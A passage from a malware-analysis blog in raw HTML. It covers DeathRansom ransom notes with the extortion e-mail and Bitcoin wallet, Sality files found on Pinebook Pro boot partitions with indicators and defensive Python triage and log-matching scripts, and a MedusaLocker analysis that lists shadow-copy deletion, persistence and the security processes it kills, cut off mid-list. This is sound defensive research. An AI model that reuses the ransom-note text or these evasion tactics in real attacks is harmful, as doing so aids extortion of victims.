<span class="mf">3.</span> <span class="n">Decryption</span> <span class="n">of</span> <span class="n">your</span> <span class="n">files</span> <span class="n">with</span> <span class="n">the</span> <span class="n">help</span> <span class="n">of</span> <span class="n">third</span> <span class="n">parties</span> <span class="n">may</span> <span class="n">cause</span> <span class="n">increased</span> <span class="n">price</span> <span class="p">(</span><span class="n">they</span> <span class="n">add</span> <span class="n">their</span> <span class="n">fee</span> <span class="n">to</span>
<span class="n">our</span><span class="p">)</span> <span class="n">or</span> <span class="n">you</span> <span class="n">can</span> <span class="n">become</span> <span class="n">a</span> <span class="n">victim</span> <span class="n">of</span> <span class="n">a</span> <span class="n">scam</span><span class="p">.</span>
</pre></div>
<h3>Ransomnote Version 2</h3>
<div class="highlight"><pre><span></span><span class="vm">?????????????????????????</span><span class="w"></span>
<span class="vm">??????</span><span class="n">DEATHRansom</span><span class="w"> </span><span class="vm">???????</span><span class="w"></span>
<span class="vm">?????????????????????????</span><span class="w"></span>
<span class="n">Hello</span><span class="w"> </span><span class="n">dear</span><span class="w"> </span><span class="n">friend</span><span class="p">,</span><span class="w"></span>
<span class="n">Your</span><span class="w"> </span><span class="n">files</span><span class="w"> </span><span class="n">were</span><span class="w"> </span><span class="n">encrypted</span><span class="err">!</span><span class="w"></span>
<span class="n">You</span><span class="w"> </span><span class="n">have</span><span class="w"> </span><span class="k">only</span><span class="w"> </span><span class="mi">12</span><span class="w"> </span><span class="n">hours</span><span class="w"> </span><span class="k">to</span><span class="w"> </span><span class="n">decrypt</span><span class="w"> </span><span class="n">it</span><span class="w"></span>
<span class="ow">In</span><span class="w"> </span><span class="k">case</span><span class="w"> </span><span class="k">of</span><span class="w"> </span><span class="k">no</span><span class="w"> </span><span class="n">answer</span><span class="w"> </span><span class="n">our</span><span class="w"> </span><span class="n">team</span><span class="w"> </span><span class="n">will</span><span class="w"> </span><span class="k">delete</span><span class="w"> </span><span class="n">your</span><span class="w"> </span><span class="n">decryption</span><span class="w"> </span><span class="n">password</span><span class="w"></span>
<span class="k">Write</span><span class="w"> </span><span class="n">back</span><span class="w"> </span><span class="k">to</span><span class="w"> </span><span class="n">our</span><span class="w"> </span><span class="n">e</span><span class="o">-</span><span class="nl">mail</span><span class="p">:</span><span class="w"> </span><span class="n">deathransom</span><span class="nv">@airmail</span><span class="o">[</span><span class="n">.</span><span class="o">]</span><span class="n">cc</span><span class="w"></span>
<span class="ow">In</span><span class="w"> </span><span class="n">your</span><span class="w"> </span><span class="n">message</span><span class="w"> </span><span class="n">you</span><span class="w"> </span><span class="n">have</span><span class="w"> </span><span class="k">to</span><span class="w"> </span><span class="k">write</span><span class="err">:</span><span class="w"></span>
<span class="mf">1.</span><span class="w"> </span><span class="n">YOU</span><span class="w"> </span><span class="n">LOCK</span><span class="o">-</span><span class="nl">ID</span><span class="p">:</span><span class="w"> </span><span class="n">PUmZiYT3OkC9IpVXHpZFOFzZ5Y7</span><span class="o">+</span><span class="n">dLuV9cYUSZ30UyPLeMPEPO4TZ79CCCbiTpSltqKKBv3oFqgH0O6lyre7hv3CJH9Dj22QqbrG</span><span class="o">/</span><span class="n">TDRsN7I51ByXUmbeXy2O4OFxPXuUBUPiFdevwY</span><span class="o">/</span><span class="mi">9</span><span class="n">KEb1c</span><span class="o">+</span><span class="n">vfP9sDY2i2e5m8rtlFsig7F4ZGPlOPmf</span><span class="o">/</span><span class="n">zxGbP1frxuW</span><span class="o">+</span><span class="n">NA9KUN0eR2C9NSH1AmDZ4rAAvCjmDKgOhCniLiT2UE</span><span class="o">+</span><span class="n">TAIDExPdCHmiKIAg1wEGg4udkRpIpn8BYSr1O</span><span class="o">+</span><span class="n">mFkBCOinIpOHAyAgnraDDjTcqtYAUO3WlglahxoufFQlwml3Sn7g0G1UAgauxSHrHZNsppuiTvCbEFLVjVGSVfsrQFIaINiTldYjjoLM05lNhjIjIW</span><span class="o">+</span><span class="n">TIRFu0PSdp3</span><span class="o">+</span><span class="mi">7</span><span class="n">CdV</span><span class="o">/</span><span class="n">UoRJtpI1qrp</span><span class="o">/</span><span class="n">ltJG5Gn</span><span class="o">+</span><span class="n">q5n2</span><span class="o">/</span><span class="n">fIMnJpkxIXlqlUcmHomfpGxzFcT2x</span><span class="o">+</span><span class="n">hsAQiPmaqXpKZ2dUHjeCHYlMBVIWEj3IzPPp5mxLESliaDT2dU3XS8ONNMfhLa6ObVpg9IZKoFlQFDDMb4o6RtExkfoWSzBLl2GD</span><span class="o">+</span><span class="mi">8</span><span class="n">uHbpQvPPXm4NfSYOhpd2J5rnHZtVUYkg</span><span class="o">+</span><span class="n">k2DrS</span><span class="o">+</span><span class="n">F9FJKRw0OkgMsiVHZAenm2</span><span class="o">+</span><span class="n">u2q38</span><span class="o">/</span><span class="n">D3</span><span class="o">+/</span><span class="n">cPeRns</span><span class="o">/</span><span class="mi">3</span><span 
class="n">aDg5J8DrUyTPrvZ46d393P9C</span><span class="o">+</span><span class="n">FZzvdF</span><span class="o">+</span><span class="n">d04nxMcg15PdvFXjvfRZEOps1qpwbbuqzO3LtV3MzTmNRFf2LRVQ</span><span class="o">==</span><span class="w"></span>
<span class="mf">2.</span><span class="w"> </span><span class="nc">Time</span><span class="w"> </span><span class="k">when</span><span class="w"> </span><span class="n">you</span><span class="w"> </span><span class="n">have</span><span class="w"> </span><span class="n">paid</span><span class="w"> </span><span class="mf">0.1</span><span class="w"> </span><span class="n">btc</span><span class="w"> </span><span class="k">to</span><span class="w"> </span><span class="n">this</span><span class="w"> </span><span class="n">bitcoin</span><span class="w"> </span><span class="nl">wallet</span><span class="p">:</span><span class="w"></span>
<span class="mi">1</span><span class="n">J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N</span><span class="w"></span>
<span class="k">After</span><span class="w"> </span><span class="n">payment</span><span class="w"> </span><span class="n">our</span><span class="w"> </span><span class="n">team</span><span class="w"> </span><span class="n">will</span><span class="w"> </span><span class="n">decrypt</span><span class="w"> </span><span class="n">your</span><span class="w"> </span><span class="n">files</span><span class="w"> </span><span class="n">immediatly</span><span class="w"></span>
<span class="k">Free</span><span class="w"> </span><span class="n">decryption</span><span class="w"> </span><span class="k">as</span><span class="w"> </span><span class="nl">guarantee</span><span class="p">:</span><span class="w"></span>
<span class="mf">1.</span><span class="w"> </span><span class="k">File</span><span class="w"> </span><span class="n">must</span><span class="w"> </span><span class="n">be</span><span class="w"> </span><span class="k">less</span><span class="w"> </span><span class="k">than</span><span class="w"> </span><span class="mi">1</span><span class="n">MB</span><span class="w"></span>
<span class="mf">2.</span><span class="w"> </span><span class="k">Only</span><span class="w"> </span><span class="p">.</span><span class="n">txt</span><span class="w"> </span><span class="ow">or</span><span class="w"> </span><span class="p">.</span><span class="n">lnk</span><span class="w"> </span><span class="n">files</span><span class="p">,</span><span class="w"> </span><span class="k">no</span><span class="w"> </span><span class="n">databases</span><span class="w"></span>
<span class="mf">3.</span><span class="w"> </span><span class="k">Only</span><span class="w"> </span><span class="mi">1</span><span class="w"> </span><span class="n">files</span><span class="w"></span>
<span class="n">How</span><span class="w"> </span><span class="k">to</span><span class="w"> </span><span class="n">obtain</span><span class="w"> </span><span class="nl">bitcoin</span><span class="p">:</span><span class="w"></span>
<span class="n">The</span><span class="w"> </span><span class="n">easiest</span><span class="w"> </span><span class="n">way</span><span class="w"> </span><span class="k">to</span><span class="w"> </span><span class="n">buy</span><span class="w"> </span><span class="n">bitcoins</span><span class="w"> </span><span class="k">is</span><span class="w"> </span><span class="n">LocalBitcoins</span><span class="w"> </span><span class="n">site</span><span class="p">.</span><span class="w"> </span><span class="n">You</span><span class="w"> </span><span class="n">have</span><span class="w"> </span><span class="k">to</span><span class="w"> </span><span class="n">register</span><span class="p">,</span><span class="w"> </span><span class="n">click</span><span class="w"> </span><span class="s1">'Buy bitcoins'</span><span class="p">,</span><span class="w"> </span><span class="ow">and</span><span class="w"> </span><span class="k">select</span><span class="w"> </span><span class="n">the</span><span class="w"> </span><span class="n">seller</span><span class="w"> </span><span class="k">by</span><span class="w"> </span><span class="n">payment</span><span class="w"> </span><span class="k">method</span><span class="w"> </span><span class="ow">and</span><span class="w"> </span><span class="n">price</span><span class="p">.</span><span class="w"></span>
<span class="nl">hxxps</span><span class="p">:</span><span class="o">//</span><span class="n">localbitcoins</span><span class="o">[</span><span class="n">.</span><span class="o">]</span><span class="n">com</span><span class="o">/</span><span class="n">buy_bitcoins</span><span class="w"></span>
<span class="n">Also</span><span class="w"> </span><span class="n">you</span><span class="w"> </span><span class="n">can</span><span class="w"> </span><span class="n">find</span><span class="w"> </span><span class="n">other</span><span class="w"> </span><span class="n">places</span><span class="w"> </span><span class="k">to</span><span class="w"> </span><span class="n">buy</span><span class="w"> </span><span class="n">Bitcoins</span><span class="w"> </span><span class="ow">and</span><span class="w"> </span><span class="n">beginners</span><span class="w"> </span><span class="n">guide</span><span class="w"> </span><span class="nl">here</span><span class="p">:</span><span class="w"></span>
<span class="nl">hxxp</span><span class="p">:</span><span class="o">//</span><span class="n">www</span><span class="p">.</span><span class="n">coindesk</span><span class="o">[</span><span class="n">.</span><span class="o">]</span><span class="n">com</span><span class="o">/</span><span class="n">information</span><span class="o">/</span><span class="n">how</span><span class="o">-</span><span class="n">can</span><span class="o">-</span><span class="n">i</span><span class="o">-</span><span class="n">buy</span><span class="o">-</span><span class="n">bitcoins</span><span class="o">/</span><span class="w"></span>
</pre></div>
<p></br></p>
<p>Gallow Icon made by <a href="https://www.flaticon.com/free-icon/gallow_2213639?term=death&page=1&position=11">Freepik</a> from www.flaticon.com</p>
<h1>About PINEs and supply chain attacks gone wrong</h1>
<p>Published 2019-11-09 by f0wL</p>
<p>I got myself a Pinebook Pro to run and port OpenBSD on. (Un)fortunately it seems like slowly but surely everything I get my hands on has something to do with Malware, so let's have a look at what's in store today.</p>
<p><br></p>
<p><center><img alt="Factory" src="https://dissectingmalwa.re/img/sality-factory.jpg"></center></p>
<p></br></p>
<p>Sality @ <a href="https://app.any.run/tasks/975aa845-30c6-4443-9bd4-b9069a968edb">AnyRun</a> | <a href="https://www.hybrid-analysis.com/sample/37f1b6394a408e0a959b82ff118a526c1362b4ddc1db5da03c9ffa70acaebff4/5dc2e02f0288384a2de46612">HybridAnalysis</a> | <a href="https://www.virustotal.com/gui/file/1c0c8aad037bde4bbf3221a0a8385022c24d5a69d59ef07829ef66a9f6ca7b01/detection">VirusTotal</a>
--> <code>sha256 37f1b6394a408e0a959b82ff118a526c1362b4ddc1db5da03c9ffa70acaebff4</code></p>
<p><em>To all Pinebook users that may be affected by this malware: it will not pose any threat to the notebook itself. It will, however, potentially infect Windows machines that mount the eMMC storage (which is not a common use case). To remove Sality simply run a system upgrade or run this <a href="https://github.com/mrfixit2001/updates_repo/blob/v1.4/pinebook/filesystem/cleanboot.sh">script</a> manually.</em></p>
<p>On the 3rd of November it was first publicly disclosed by stheo on Twitter that there were unidentified Windows-related files on the boot partition of the Pinebook Pro. As the discussion in the Discord/IRC chat evolved it became clear that only the second batch (the 64GB eMMC versions) of the notebook is affected. The initial VirusTotal analysis revealed that the files in question were related to the Sality botnet. Calling this a "supply chain attack" is also pretty clickbaity (I'm sorry :D), but what it boils down to is that one or more flashing stations in the factory in China have been infected with Sality. These systems often run outdated software (in this case probably XP or older) and have poor security standards.</p>
<p></br></p>
<p><center><blockquote class="twitter-tweet"><p lang="en" dir="ltr"><a href="https://twitter.com/thepine64?ref_src=twsrc%5Etfw">@thepine64</a> Why do I have a malware called “yvyfr.exe” with an autorun.inf on my boot partition of my Pinebook Pro ? I have no Windows at home and it’s a fresh install and update of the Pinebook Pro. <br>VT analysis : <a href="https://t.co/Hne9BR15vQ">https://t.co/Hne9BR15vQ</a> <a href="https://t.co/zIHz7sm6VB">pic.twitter.com/zIHz7sm6VB</a></p>— studer (@stheo) <a href="https://twitter.com/stheo/status/1191031857443483649?ref_src=twsrc%5Etfw">November 3, 2019</a></blockquote></center></p>
<p></br></p>
<p>After receiving my Pinebook I immediately opened the Dolphin file manager to check <em>/boot</em> and sure enough, there were two files with seemingly random filenames ending in <em>.pif</em> and an <em>autorun.inf</em> file. The other files in this directory are <em>not</em> affiliated with the Sality botnet: <strong>rk3399-pinebookpro.dtb</strong> is the device tree (DTS/DTB) file, <strong>Image</strong> contains the kernel (for both of these files there may also be backup copies present, marked with a .bak suffix) and the extlinux directory contains files related to the bootloader.</p>
<p></br></p>
<p><center><img alt="On the Pinebook" src="https://dissectingmalwa.re/img/sality-pbp.png"></center></p>
<p></br></p>
<p>I haven't seen a <strong>pif</strong> file in a pretty long time, so I had to refresh my memory a bit as well. PIF stands for "Program Information File" and describes certain environment settings for a given application. In modern versions of Windows this information is stored in <em>.LNK</em> files. So does it contain shell commands, similar to how the GermanWiper stage 1 worked? Quoting <a href="https://en.wikipedia.org/wiki/Program_information_file">Wikipedia</a> here: </p>
<div class="highlight"><pre><span></span><span class="ss">"Although a file in PIF format does not contain any executable code (it lacks executable files' magic number "</span><span class="n">MZ</span><span class="ss">"), Microsoft Windows handles all files with (pseudo-)executables' extensions in the same manner: all .COMs, .EXEs, and .PIFs are analyzed by the ShellExecute function and will run accordingly to their content and not extension, meaning a file with the PIF extension can be used to transmit computer viruses."</span>
</pre></div>
<p>Sounds really interesting 🤔 So let's throw it into a hex editor and ... wait, is that an MZ header? Looks like we've got an executable here after all.</p>
<p></br></p>
<p><center><img alt="MZ Header" src="https://dissectingmalwa.re/img/sality-mz.png"></center></p>
<p></br></p>
<p>It also looks like at least one of the two EXEs has been padded quite heavily.</p>
<p></br></p>
<p><center><img alt="File padding" src="https://dissectingmalwa.re/img/sality-padd.png"></center></p>
<p></br></p>
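<p>A content-based file triage for exactly the situation above, as an added example that is not code from the post: it decides whether a file is a PE image by checking the MZ header and the PE signature at e_lfanew instead of trusting the extension, and it measures the trailing zero padding that the hex editor showed. The sample bytes are constructed here (header fields only, not a working executable), and <code>scan_directory</code> is a hypothetical helper for running the check over a mounted boot partition.</p>

```python
import struct
from pathlib import Path


def build_sample(padding: int) -> bytes:
    """Constructed sample: a minimal MZ stub whose e_lfanew points at a PE
    signature, followed by `padding` zero bytes. Headers only, not runnable."""
    dos = bytearray(0x40)
    dos[0:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)          # e_lfanew -> right after the DOS header
    nt = b"PE\x00\x00" + struct.pack("<H", 0x14C)    # signature + IMAGE_FILE_MACHINE_I386
    return bytes(dos) + nt + b"\x00" * 18 + b"\x00" * padding


def is_pe(data: bytes) -> bool:
    """True if the bytes carry an MZ header whose e_lfanew points at 'PE\\0\\0'.
    The extension is deliberately ignored: ShellExecute runs .pif by content too."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def trailing_zero_ratio(data: bytes) -> float:
    """Fraction of the file that is one trailing run of zero bytes (crude padding measure)."""
    if not data:
        return 0.0
    return (len(data) - len(data.rstrip(b"\x00"))) / len(data)


def triage(name: str, data: bytes, pad_threshold: float = 0.5) -> dict:
    """Classify one file; findings are short tags a reviewer can grep for."""
    ext = Path(name).suffix.lower()
    pe = is_pe(data)
    pad = trailing_zero_ratio(data)
    findings = []
    if pe and ext != ".exe":
        findings.append("pe_content_with_%s_extension" % (ext or "no"))
    if pe and pad >= pad_threshold:
        findings.append("heavy_zero_padding")
    if name.lower() == "autorun.inf":
        findings.append("autorun_inf_present")
    return {"name": name, "is_pe": pe, "padding_ratio": round(pad, 4), "findings": findings}


def scan_directory(path: str) -> list:
    """Hypothetical helper: triage every regular file in a directory (e.g. a mounted /boot)."""
    return [triage(p.name, p.read_bytes()) for p in sorted(Path(path).iterdir()) if p.is_file()]


if __name__ == "__main__":
    # Constructed inputs: a padded PE hiding behind .pif, a kernel-like ELF image, an autorun.inf
    for result in (triage("kithj.pif", build_sample(100_000)),
                   triage("Image", b"\x7fELF" + b"\x00" * 64),
                   triage("autorun.inf", b"[autorun]\r\n")):
        print(result)
```

<p>The padding ratio is only a hint: a legitimate image can also be zero-padded to a sector boundary, so the PE check is what carries the weight, and the threshold is there to rank, not to decide.</p>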
<p>Running <em>kithj.exe</em> in AnyRun with standard UAC settings results in the malware injecting into the Desktop Window Manager process, so that its access request appears to come from an elevated and legitimate-looking process. </p>
<p></br></p>
<p><center><img alt="Firewall Dialog" src="https://dissectingmalwa.re/img/sality-fw.png"></center></p>
<p></br></p>
<p>Looking at the Process Graph we notice multiple process injections into various system applications (namely the Windows Explorer, Desktop Window Manager, Task Scheduler and WindaNr). </p>
<p></br></p>
<p><center><img alt="Anyrun Process Graph" src="https://dissectingmalwa.re/img/sality-processgraph.png"></center></p>
<p></br></p>
<p>Ghidra can't make much of it with the standard analysis settings and can only find two "functions" in total.</p>
<p></br></p>
<p><center><img alt="Functions detected by Ghidra" src="https://dissectingmalwa.re/img/sality-func.png"></center></p>
<p></br></p>
<h2><em>IOCs</em></h2>
<h3>Sality Hashes</h3>
<div class="highlight"><pre><span></span><span class="n">kithj</span><span class="p">.</span><span class="n">exe</span> <span class="c1">--> SHA256: 37f1b6394a408e0a959b82ff118a526c1362b4ddc1db5da03c9ffa70acaebff4</span>
<span class="n">SSDEEP</span><span class="p">:</span> <span class="mi">3072</span><span class="p">:</span><span class="n">m5y36RPOJTdktKKu37BLgwl7gMt7pwObB</span><span class="p">:</span><span class="n">mQqRQydiBLJl7Jt7N</span>
<span class="n">augjb</span><span class="p">.</span><span class="n">exe</span> <span class="c1">--> SHA256: 6245eb607e53209126191e4b6cdf7d64f52394f6bc6a2a9529a28ed49be19c82</span>
<span class="n">SSDEEP</span><span class="p">:</span> <span class="mi">3072</span><span class="p">:</span><span class="n">EE6sGYXKm</span><span class="o">+</span><span class="n">NFN3GtRM0XS0aGNH3MYaOJEQ</span><span class="o">/</span><span class="n">Xh6</span><span class="p">:</span><span class="n">AsqdWdbaG8YOcx6</span>
<span class="n">autorun</span><span class="p">.</span><span class="n">inf</span> <span class="c1">--> SHA256: f5adcd0989f9c4033fcd214e8998dde85865c6bf178c4eaed94128e6f5389bd6</span>
</pre></div>
<h3>Associated Files</h3>
<div class="highlight"><pre><span></span><span class="n">augjb</span><span class="p">.</span><span class="n">pif</span><span class="p">(.</span><span class="n">exe</span><span class="p">)</span>
<span class="n">kithj</span><span class="p">.</span><span class="n">pif</span><span class="p">(.</span><span class="n">exe</span><span class="p">)</span>
<span class="n">autorun</span><span class="p">.</span><span class="n">inf</span>
</pre></div>
<h3>URLs</h3>
<div class="highlight"><pre><span></span><span class="n">hxxp</span><span class="p">:</span><span class="o">//</span><span class="n">padrup</span><span class="p">[.]</span><span class="n">com</span><span class="p">.</span><span class="n">ds</span><span class="o">/</span><span class="n">sobaka1</span><span class="p">.</span><span class="n">gif</span>
<span class="n">hxxp</span><span class="p">:</span><span class="o">//</span><span class="n">paaaaad</span><span class="p">[.]</span><span class="n">fd</span><span class="p">.</span><span class="n">fd</span>
</pre></div>
<h3>IPs of contacted Hosts</h3>
<div class="highlight"><pre><span></span><span class="n">IP</span> <span class="o">-</span> <span class="n">Port</span> <span class="o">-</span> <span class="n">exclusively</span> <span class="n">UDP</span>
<span class="mi">118</span><span class="p">.</span><span class="mi">136</span><span class="p">.</span><span class="mi">16</span><span class="p">.</span><span class="mi">138</span> <span class="o">-</span> <span class="mi">5614</span>
<span class="mi">180</span><span class="p">.</span><span class="mi">247</span><span class="p">.</span><span class="mi">53</span><span class="p">.</span><span class="mi">107</span> <span class="o">-</span> <span class="mi">7866</span>
<span class="mi">86</span><span class="p">.</span><span class="mi">107</span><span class="p">.</span><span class="mi">231</span><span class="p">.</span><span class="mi">10</span> <span class="o">-</span> <span class="mi">7534</span>
<span class="mi">93</span><span class="p">.</span><span class="mi">114</span><span class="p">.</span><span class="mi">69</span><span class="p">.</span><span class="mi">232</span> <span class="o">-</span> <span class="mi">5684</span>
<span class="mi">220</span><span class="p">.</span><span class="mi">247</span><span class="p">.</span><span class="mi">166</span><span class="p">.</span><span class="mi">100</span> <span class="o">-</span> <span class="mi">4492</span>
<span class="mi">202</span><span class="p">.</span><span class="mi">177</span><span class="p">.</span><span class="mi">246</span><span class="p">.</span><span class="mi">59</span> <span class="o">-</span> <span class="mi">6715</span>
<span class="mi">189</span><span class="p">.</span><span class="mi">122</span><span class="p">.</span><span class="mi">188</span><span class="p">.</span><span class="mi">39</span> <span class="o">-</span> <span class="mi">7538</span>
<span class="mi">89</span><span class="p">.</span><span class="mi">38</span><span class="p">.</span><span class="mi">237</span><span class="p">.</span><span class="mi">65</span> <span class="o">-</span> <span class="mi">5064</span>
<span class="mi">188</span><span class="p">.</span><span class="mi">215</span><span class="p">.</span><span class="mi">25</span><span class="p">.</span><span class="mi">69</span> <span class="o">-</span> <span class="mi">6310</span>
<span class="mi">14</span><span class="p">.</span><span class="mi">96</span><span class="p">.</span><span class="mi">75</span><span class="p">.</span><span class="mi">194</span> <span class="o">-</span> <span class="mi">6130</span>
<span class="mi">212</span><span class="p">.</span><span class="mi">76</span><span class="p">.</span><span class="mi">78</span><span class="p">.</span><span class="mi">10</span> <span class="o">-</span> <span class="mi">6260</span>
<span class="mi">14</span><span class="p">.</span><span class="mi">98</span><span class="p">.</span><span class="mi">120</span><span class="p">.</span><span class="mi">25</span> <span class="o">-</span> <span class="mi">6740</span>
<span class="mi">112</span><span class="p">.</span><span class="mi">204</span><span class="p">.</span><span class="mi">145</span><span class="p">.</span><span class="mi">248</span> <span class="o">-</span> <span class="mi">5300</span>
<span class="mi">200</span><span class="p">.</span><span class="mi">8</span><span class="p">.</span><span class="mi">145</span><span class="p">.</span><span class="mi">17</span> <span class="o">-</span> <span class="mi">6780</span>
</pre></div>
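<p>One way to put the peer list above to use on the network side, as an added example that is not part of the post: it parses the "IP - Port" pairs exactly as printed and matches them against a Zeek conn.log excerpt (the log lines are constructed for this example), reporting exact IP/port/UDP matches separately from weaker IP-only hits on another port or protocol.</p>

```python
# IoC list as printed above ("IP - Port", all UDP), copied from the post.
SALITY_PEERS_TEXT = """\
118.136.16.138 - 5614
180.247.53.107 - 7866
86.107.231.10 - 7534
93.114.69.232 - 5684
220.247.166.100 - 4492
202.177.246.59 - 6715
189.122.188.39 - 7538
89.38.237.65 - 5064
188.215.25.69 - 6310
14.96.75.194 - 6130
212.76.78.10 - 6260
14.98.120.25 - 6740
112.204.145.248 - 5300
200.8.145.17 - 6780
"""

# Constructed Zeek conn.log excerpt (tab separated, trimmed to the columns we need).
CONN_LOG = """\
#separator \\x09
#fields\tts\tuid\tid.orig_h\tid.orig_p\tid.resp_h\tid.resp_p\tproto\tservice
1573000000.10\tCx1\t10.0.0.5\t52011\t118.136.16.138\t5614\tudp\t-
1573000001.20\tCx2\t10.0.0.5\t52012\t93.114.69.232\t5684\tudp\t-
1573000002.30\tCx3\t10.0.0.5\t52013\t93.114.69.232\t443\ttcp\t-
1573000003.40\tCx4\t10.0.0.7\t52014\t8.8.8.8\t53\tudp\tdns
"""


def parse_ioc_pairs(text: str) -> set:
    """Turn 'IP - Port' lines into a set of (ip, port) tuples; other lines are skipped."""
    pairs = set()
    for line in text.splitlines():
        if " - " not in line:
            continue
        ip, port = (part.strip() for part in line.split(" - ", 1))
        pairs.add((ip, int(port)))
    return pairs


def iter_conn_records(log_text: str):
    """Yield each data row of a Zeek conn.log as a dict keyed by the #fields header."""
    fields = None
    for line in log_text.splitlines():
        if line.startswith("#fields"):
            fields = line.split("\t")[1:]
        elif line.startswith("#") or not line.strip():
            continue
        elif fields:
            yield dict(zip(fields, line.split("\t")))


def match_conn_log(log_text: str, ioc_pairs: set) -> list:
    """Exact hits need IP, port and UDP to agree; an IoC IP on another port/proto is reported
    as 'ip_only' so an analyst can still look at it without treating it as confirmed."""
    ioc_ips = {ip for ip, _ in ioc_pairs}
    hits = []
    for rec in iter_conn_records(log_text):
        dst = (rec["id.resp_h"], int(rec["id.resp_p"]))
        if rec["proto"] == "udp" and dst in ioc_pairs:
            hits.append({"uid": rec["uid"], "src": rec["id.orig_h"], "dst": dst, "level": "exact"})
        elif dst[0] in ioc_ips:
            hits.append({"uid": rec["uid"], "src": rec["id.orig_h"], "dst": dst, "level": "ip_only"})
    return hits


if __name__ == "__main__":
    for hit in match_conn_log(CONN_LOG, parse_ioc_pairs(SALITY_PEERS_TEXT)):
        print(hit)
```

<p>Peer lists of a P2P botnet churn quickly, so the exact matches are most useful close to the observation date; the IP-only tier keeps the list useful a little longer without inflating confidence.</p>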
<p><br></p>
<h1>Try not to stare - MedusaLocker at a glance</h1>
<p>Published 2019-11-05 by f0wL</p>
<p>Mystic but also a new(-ish) threat: Medusa ransomware. Let's take a quick peek, but don't look too close or you may need to fetch backups soon.</p>
<p><center><img alt="Logo" src="https://dissectingmalwa.re/img/myth.png"></center></p>
<h4><em>A general disclaimer as always: downloading and running the samples linked below will lead to the encryption of your personal data, so be f$cking careful. Also check with your local laws as owning malware binaries/ sources might be illegal depending on where you live.</em></h4>
<p>medusa.exe @ <a href="https://app.any.run/tasks/75bbf936-ab86-4a02-9512-290d130f4c2c/">AnyRun</a>
--> <code>sha256 3a5b015655f3aad4b4fd647aa34fda4ce784d75a20d12a73f8dc0e0d866e7e01</code></p>
<p>dix_16.exe @ <a href="https://www.hybrid-analysis.com/sample/49da42d00cc3ad6379ead2e07fd5f09bd358b144a6e78aad4bb1a8298e2bb568">HybridAnalysis</a>
--> <code>sha256 49da42d00cc3ad6379ead2e07fd5f09bd358b144a6e78aad4bb1a8298e2bb568</code></p>
<p></br></p>
<p>Taking a look at the string dump that <a href="https://github.com/fireeye/stringsifter">stringsifter</a> produced, one of the first things that stood out was this base64-encoded image:</p>
<p><center><img alt="Image Base64 String" src="https://dissectingmalwa.re/img/medusa-image.png"></center></p>
<p></br></p>
<p>After decoding it we get an image of a medieval plague doctor. Fun fact: they wore these masks because they thought it would protect them from the Black Death. One day someone will probably start selling these for endpoint protection. </p>
<p><center><img alt="Pest Doctor" src="https://dissectingmalwa.re/img/medusa-pngpest.png"></center></p>
<p></br></p>
<p>Another interesting extracted string is this PDB-Path: <em>C:\Users\Gh0St\Desktop\MedusaLockerInfo\MedusaLockerProject\MedusaLocker\Release\MedusaLocker.pdb</em></p>
<p>Running it through Detect It Easy shows that MedusaLocker was built with Visual C++ and a (in malware terms) relatively new linker version.
<center><img alt="Detect it easy" src="https://dissectingmalwa.re/img/medusa-die.png"></center></p>
<p>Entropy-wise it doesn't look like this sample is packed and the sections found don't look out of the ordinary either.</p>
<p><center><img alt="medusa.exe Entropy" src="https://dissectingmalwa.re/img/medusa-entropy.png"></center></p>
<p>After digging around in Ghidra for a bit I found <strong>FUN_00405bc0</strong> which seems to be the main program routine of MedusaLocker. The strings shown here match the output in the debug console present in the second sample discussed below.</p>
<p><center><img alt="Ghidra Main Function" src="https://dissectingmalwa.re/img/medusa-func.png"></center></p>
<p></br></p>
<p>Yet another mysterious CLSID that I can't make sense of at the moment: {8761ABBD-7F85-42EE-B272-A76179687C63}. Search results referencing it are around since October 21st and might make tracking Medusa a bit easier.</p>
<p><center><img alt="Running and CLSID" src="https://dissectingmalwa.re/img/medusa_running.png"></center></p>
<p></br></p>
<p>Next up the Locker will "initialize the crypto module", which uses <a href="https://docs.microsoft.com/en-us/windows/win32/api/wincrypt/nf-wincrypt-cryptgenkey">CryptGenKey</a> provided by WinCrypt to generate a keypair. I'll have a closer look at the encryption routine later.</p>
<p><center><img alt="Initialization of the crypto module" src="https://dissectingmalwa.re/img/medusa_crypterInit.png"></center></p>
<p></br></p>
<p>It will skip files with the following suffixes:</p>
<p><center><code>exe, dll, sys, ini, lnk, rdp, encrypted</code></center></p>
<p></br></p>
<p>As it is very common for ransomware to disable Automatic Startup Repair and delete System Restore Points and shadow copies, Medusa does so as well. After that it also relaunches <strong>LanmanWorkstation</strong> to ensure that mapped network drives are available.</p>
<p><center><img alt="Deletion of system backups and shadow copies" src="https://dissectingmalwa.re/img/medusa-backups.png"></center></p>
<p></br></p>
<p><center><img alt="Process Kill" src="https://dissectingmalwa.re/img/medusa-kill.png"></center></p>
<p></br></p>
<p>After the "Adding to Autoload" debug message it renames itself to svchost.exe and adds its registry key to the system startup.</p>
<p><center><img alt="Pest Doctor" src="https://dissectingmalwa.re/img/medusa_startup.png"></center></p>
<p></br></p>
<p>MedusaLocker will try to terminate the following processes by name. The list contains security software as well as services commonly used in production environments, such as SQL or web servers.</p>
<div class="highlight"><pre><span></span><span class="n">wrapper</span><span class="p">,</span> <span class="n">DefWatch</span><span class="p">,</span> <span class="n">ccEvtMgr</span><span class="p">,</span> <span class="n">ccSetMgr</span><span class="p">,</span> <span class="n">SavRoam</span><span class="p">,</span> <span class="n">sqlservr</span><span class="p">,</span> <span class="n">sqlagent</span><span class="p">,</span> <span class="n">sqladhlp</span><span class="p">,</span> <span class="n">Culserver</span><span class="p">,</span> <span class="n">RTVscan</span><span class="p">,</span> <span class="n">sqlbrowser</span><span class="p">,</span> <span class="n">SQLADHLP</span><span class="p">,</span>
<span class="n">QBIDPService</span><span class="p">,</span> <span class="n">Intuit</span><span class="p">.</span><span class="n">QuickBooks</span><span class="p">.</span><span class="n">FCS</span><span class="p">,</span> <span class="n">QBCFMonitorService</span><span class="p">,</span> <span class="n">sqlwriter</span><span class="p">,</span> <span class="n">msmdsrv</span><span class="p">,</span> <span class="n">tomcat6</span><span class="p">,</span> <span class="n">zhudongfangyu</span><span class="p">,</span> <span class="n">SQLADHLP</span><span class="p">,</span>
